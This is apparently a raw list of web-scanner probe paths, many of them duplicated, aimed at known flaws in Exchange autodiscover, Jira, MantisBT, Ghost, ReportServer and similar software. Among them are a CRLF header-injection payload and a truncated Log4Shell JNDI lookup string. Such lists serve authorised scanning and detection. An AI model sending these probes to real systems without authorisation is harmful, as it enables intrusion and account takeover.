/web/device.rsp?opt=user&cmd=list
/web/wp-content/plugins/jh-404-logger/readme.txt
/web/wp-json/buddypress/v1/signup
/web/ghost/preview
/web/auth/requestreset
/web/ReportServer/Pages/ReportViewer.aspx
/web/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin
/web/verify.php?id=1&confirm_hash=
/web/api/snapshots
/web/pandora_console/attachment/pandora_chat.log.json.txt
/web/javax.faces.resource/dynamiccontent.properties.xhtml
/web/ReportServer/Pages/ReportViewer.aspx
/web/ghost/preview
/web/auth/requestreset
/web/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin
/web/api/snapshots
/web/verify.php?id=1&confirm_hash=
/web/javax.faces.resource/dynamiccontent.properties.xhtml
/web/pandora_console/attachment/pandora_chat.log.json.txt
/web/casa/nodes/thumbprints
/web/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
/web/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin
/web/share/page/dologin
/web/mantis/verify.php?id=1&confirm_hash=
/web/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0
/web/search/
/web/mailingupgrade.php
/web/casa/nodes/thumbprints
/web/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
/web/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin
/web/share/page/dologin
/web/mantis/verify.php?id=1&confirm_hash=
/web/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0
/web/search/
/web/mailingupgrade.php
/web/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
/web/mantisBT/verify.php?id=1&confirm_hash=
/web/mantisbt-2.3.0/verify.php?id=1&confirm_hash=
/web/bugs/verify.php?confirm_hash=&id=1
/web/?x=${jndi:ldap://127.0.0.1
